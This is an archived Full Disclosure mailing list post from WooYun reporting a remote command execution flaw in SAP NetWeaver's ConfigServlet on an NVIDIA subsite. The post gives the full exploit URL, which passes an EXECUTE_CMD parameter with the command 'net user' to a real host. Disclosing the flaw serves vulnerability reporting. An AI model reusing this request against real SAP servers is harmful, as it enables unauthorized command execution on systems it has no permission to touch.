Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[Wooyun] NVIDIA a SAP NETWEAVER remote command execution
From: "En.wooyun.org" <help.en () wooyun org>
Date: Wed, 8 Jan 2014 00:25:48 +0800

*Abstract:*
NVIDIA a subsite SAP NETWEAVER remote command execution.

*Details:*
url:
https://nvcare.nvidia.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net%20user

*Proofs of concept:*

*[image: 内嵌图片 1]*

*Form:*
http://en.wooyun.org/bugs/wooyun-2013-041
-- 

WooYun, an Open and Free Vulnerability Reporting Platform

For more information, please visit *http://en.wooyun.org/about.php
<http://en.wooyun.org/about.php?>*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • [Wooyun] NVIDIA a SAP NETWEAVER remote command execution En.wooyun.org (Jan 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault